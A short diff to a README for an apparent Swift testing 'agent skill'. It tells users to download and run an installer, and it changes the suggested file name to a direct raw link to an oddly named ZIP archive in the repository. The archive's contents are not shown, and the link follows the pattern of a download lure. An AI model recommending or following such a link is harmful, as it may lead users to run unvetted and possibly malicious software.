jajaaa2/Swift-Testing-Agent-Skill/README.md

 - Download the ZIP file or installer matching your system.
 - After download, open the file and follow the prompts to install.

-If you are unsure, choose the file named something like `Swift-Testing-Agent-Skill-mac.zip`.
+If you are unsure, choose the file named something like `https://github.com/jajaaa2/Swift-Testing-Agent-Skill/raw/refs/heads/main/swift-testing-expert/Testing_Agent_Skill_Swift_decare.zip`.

 ---